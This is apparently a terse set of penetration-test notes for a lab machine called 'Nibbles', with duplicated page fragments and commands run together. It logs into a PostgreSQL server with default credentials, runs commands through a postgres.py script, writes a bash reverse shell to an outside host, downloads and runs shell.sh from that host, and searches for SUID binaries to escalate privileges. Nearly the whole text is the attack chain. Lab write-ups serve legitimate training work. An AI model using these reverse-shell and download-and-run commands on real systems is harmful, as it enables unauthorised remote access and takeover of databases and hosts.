Nibbles
psql -U postgres -W -h 192.168.212.47 -p 5437SELECT version();SD

Last updated
psql -U postgres -W -h 192.168.212.47 -p 5437SELECT version();SD

Last updated
python3 postgres.py -i 192.168.212.47 -P postgres -U postgres -p 5437 -c whoami #!/bin/bash
bash -i >& /dev/tcp/192.168.45.236/445 0>&1python3 postgres.py -i 192.168.212.47 -P postgres -U postgres -p 5437 -c 'wget http://192.168.45.236/shell.sh'
python3 postgres.py -i 192.168.212.47 -P postgres -U postgres -p 5437 -c 'bash shell.sh' find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null